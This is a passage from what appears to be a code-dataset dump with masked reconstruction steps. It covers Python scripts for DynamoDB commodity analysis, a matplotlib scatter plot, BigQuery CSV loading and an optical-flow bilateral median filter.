dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n\n # Open the encodings CSV file and read its contents\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, \"r\", newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n\n # if field is var or commodity, set a key-value pair between code and label (in the respective map)\n for row in csv_content:\n if row[2] == \"variable\":\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == \"commodity\":\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n\n # Check args for commodity now, otherwise prompt user\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n # Ask user for commodity\n commodity_input = input(\"Commodity: \").strip()\n \n # Check if input exists as code key, otherwise try to convert assumed label to code key (if not a label, code will be None after)\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input, commodity_encodings_dict)\n\n # Check if commodity found a code or None\n print(f\"ENCODING: {commodity_code}\")\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\"ERROR: Terminating program because input does not exist as an encoding commodity code or label.\")\n\n # Init total accumulators for each category\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n\n # iterate through each variable and analyze data (if applicable)\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict, commodity_encodings_dict)\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif total_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither\")\n print(f\"Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n\")\n\n############################################ FUNCTIONS ############################################\n\n# Converts the label of a dict into its code key, returns None if not a label\ndef convert_dict_label_to_code_key(label, encodings_dict):\n # Get the key of the label if the label exists in the dict as a value\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).index(label)]\n else:\n return None\n\n# Check if a commodity code + variable is common across all 4 tables, return true if it is\ndef is_common_variable(commodity_code, variable):\n return (has_commodity_and_variable(na_table, commodity_code, variable) and\n has_commodity_and_variable(canada_table, commodity_code, variable) and\n has_commodity_and_variable(usa_table, commodity_code, variable) and\n has_commodity_and_variable(mexico_table, commodity_code, variable))\n\n# Check if a table has data for commodity code + variable (ie. scan table), returns true if at least 1 item is found\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(\n FilterExpression = Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )\n return response['Count'] > 0\n\n# Retrieves and outputs table data based on commodity and variable and analyze for NA definition\ndef output_table(commodity_code, variable, variable_encodings_dict, commodity_encodings_dict):\n # Bring in globals to modify\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # Init local accumulators\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n\n # Print table headers: common variable (for commodity code) across all 4 tables, and table column names\n print(f\"Variable: {variable_encodings_dict[variable]}\")\n print(OUTPUT_FORMAT.format(\"Year\", \"North America\", \"Canada\", \"USA\", \"Mexico\", \"CAN+USA\", \"CAN+USA+MEX\", \"NA Defn\"))\n\n # Retrieve all data, from all years (ie. the items from the scan)\n na_scan_data = na_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n can_scan_data = canada_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n usa_scan_data = usa_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n mex_scan_data = mexico_table.scan(\n FilterExpression=Attr('commodity').eq(commodity_code) & Attr('variable').eq(variable)\n )['Items']\n\n # Sort each scan data by key\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n\n # Analyze data\n for year in YEAR_RANGE:\n # For each relevant year, calculate total value using multiplication factor\n i = year - 2010\n na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])\n can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])\n usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])\n mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])\n\n # Calc temp sums for the CAN+USA and CAN+USA+MEX columns\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n\n # Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither\n # Note: accumulate the #of accurate NA def 'hits'\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n\n # Print table row for current year\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n\n # Determine the NA definition for this variable based on #of 'hits' per year\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = \"CAN+USA\"\n elif temp_can_usa_mex == max_hits:\n na_defn = \"CAN+USA+MEX\"\n else:\n na_defn = \"Neither\"\n\n print(f\"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither\")\n print(f\"Therefore we can conclude North America = {na_defn}\\n\")\n\n # Accumulate global totals using temp local accumulators for NA definition 'hits'\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n# Sorter Helper for queried data by year\ndef data_sort(elem):\n return elem['year']\n\n###################################################################################################\n\nmain()\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
#!/usr/bin/env python
##!/work/local/bin/python
##!/work/local/CDAT/bin/python
import sys,getopt
import matplotlib.pyplot as plt
def read():
x = []
y = []
for line in sys.stdin:
v1,v2 = line.split()[:2]
x.append(float(v1))
y.append(float(v2))
return x,y
#def plot(x,y):
def plot(x,y,xlabel,ylabel,title,fn):
fig = plt.figure( figsize=(6.0,6.0) )
ax = fig.add_subplot(111)
ax.grid(True)
if title:
ax.set_title(title)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plot = ax.scatter( x, y, s=3, marker='o' )
mx = max(x)
mn = min(x)
plot = ax.plot( [mn,mx], [mn,mx] , 'r-')
if fn:
fname = fn
else:
fname = 'TMP_scat.png'
fig.savefig( fname, format='png' )
print 'WROTE --> %s' % fname
######################################
use = '''
Usage: %s
-h help
'''
if __name__ == '__main__':
def usage():
sys.stderr.write(use % sys.argv[0])
sys.exit(1)
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hx:y:o:t:')
except getopt.error:
usage()
fn = ''
x = 'X'
y = 'Y'
title = ''
for (opt,val) in opts:
if opt == '-x':
x = val
elif opt == '-y':
y = val
elif opt == '-t':
title = val
elif opt == '-o':
fn = val
else:
raise OptionError, opt
usage()
#if len(args) != 1:
# usage()
#fn = args[0]
xv,yv = read()
plot(xv,yv,x,y,title,fn)
|
normal
|
{
"blob_id": "b16ad4bae079159da7ef88b61081d7763d4ae9a0",
"index": 8312,
"step-1": "#!/usr/bin/env python\n##!/work/local/bin/python\n##!/work/local/CDAT/bin/python\n\nimport sys,getopt\nimport matplotlib.pyplot as plt\n\n\ndef read():\n\n x = []\n y = []\n for line in sys.stdin:\n v1,v2 = line.split()[:2]\n x.append(float(v1))\n y.append(float(v2))\n return x,y\n\n\n#def plot(x,y):\ndef plot(x,y,xlabel,ylabel,title,fn):\n\n fig = plt.figure( figsize=(6.0,6.0) )\n ax = fig.add_subplot(111)\n ax.grid(True)\n if title:\n ax.set_title(title)\n\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n plot = ax.scatter( x, y, s=3, marker='o' )\n\n mx = max(x)\n mn = min(x)\n plot = ax.plot( [mn,mx], [mn,mx] , 'r-')\n\n if fn:\n fname = fn\n else:\n fname = 'TMP_scat.png'\n fig.savefig( fname, format='png' )\n print 'WROTE --> %s' % fname\n\n\n\n######################################\nuse = '''\nUsage: %s \n\n -h help\n\n'''\nif __name__ == '__main__':\n\n def usage():\n sys.stderr.write(use % sys.argv[0])\n sys.exit(1)\n\n try:\n (opts, args) = getopt.getopt(sys.argv[1:], 'hx:y:o:t:')\n except getopt.error:\n usage()\n\n fn = ''\n x = 'X'\n y = 'Y'\n title = ''\n for (opt,val) in opts:\n if opt == '-x':\n x = val\n elif opt == '-y':\n y = val\n elif opt == '-t':\n title = val\n elif opt == '-o':\n fn = val\n else:\n raise OptionError, opt\n usage()\n\n #if len(args) != 1:\n # usage()\n #fn = args[0]\n\n xv,yv = read()\n plot(xv,yv,x,y,title,fn)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.
SchemaField('first_name', 'STRING'), bigquery.SchemaField(
'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(
'ip_address', 'STRING')]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ
['TABLE']), job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result()
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])
)
print('Loaded {} rows.'.format(destination_table.num_rows))
<|reserved_special_token_1|>
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.
SchemaField('first_name', 'STRING'), bigquery.SchemaField(
'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(
'ip_address', 'STRING')]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ
['TABLE']), job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result()
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])
)
print('Loaded {} rows.'.format(destination_table.num_rows))
<|reserved_special_token_1|>
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [
bigquery.SchemaField('id', 'INTEGER'),
bigquery.SchemaField('first_name', 'STRING'),
bigquery.SchemaField('last_name', 'STRING'),
bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'),
bigquery.SchemaField('ip_address', 'STRING')
]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
# get the URI for uploaded CSV in GCS from 'data'
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
# lets do this
load_job = client.load_table_from_uri(
uri,
dataset_ref.table(os.environ['TABLE']),
job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result() # wait for table load to complete.
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
print('Loaded {} rows.'.format(destination_table.num_rows))
|
flexible
|
{
"blob_id": "01467a4dad3255a99025c347469881a71ffbae7c",
"index": 8179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-3": "import os\nfrom google.cloud import bigquery\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-4": "import os\nfrom google.cloud import bigquery\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [\n bigquery.SchemaField('id', 'INTEGER'),\n bigquery.SchemaField('first_name', 'STRING'),\n bigquery.SchemaField('last_name', 'STRING'),\n bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'),\n bigquery.SchemaField('ip_address', 'STRING')\n ]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n\n # get the URI for uploaded CSV in GCS from 'data'\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n\n # lets do this\n load_job = client.load_table_from_uri(\n uri,\n dataset_ref.table(os.environ['TABLE']),\n job_config=job_config)\n\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n\n load_job.result() # wait for table load to complete.\n print('Job finished.')\n\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))\n print('Loaded {} rows.'.format(destination_table.num_rows))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
<|reserved_special_token_1|>
import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
<|reserved_special_token_1|>
import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,
sigma_distance = 7, sigma_color =7 / 200, filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size+1)
helper_flow_y_list = [0.0] * (helper_list_size+1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
#weigth = math.exp(-exponent) * occlusen_compared / occlusen_current
weigth = math.exp(-exponent+occlusen_compared-occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
# See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING
# 3.13
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1/(2*(weigth_auxiliary / weigth_filter))
for idx_1 in range(n+1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])
result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])
print("result_flow")
print(result_flow.flatten())
return result_flow
|
flexible
|
{
"blob_id": "1748c8dfcc3974b577d7bfacb5cabe4404b696bc",
"index": 612,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n",
"step-3": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n",
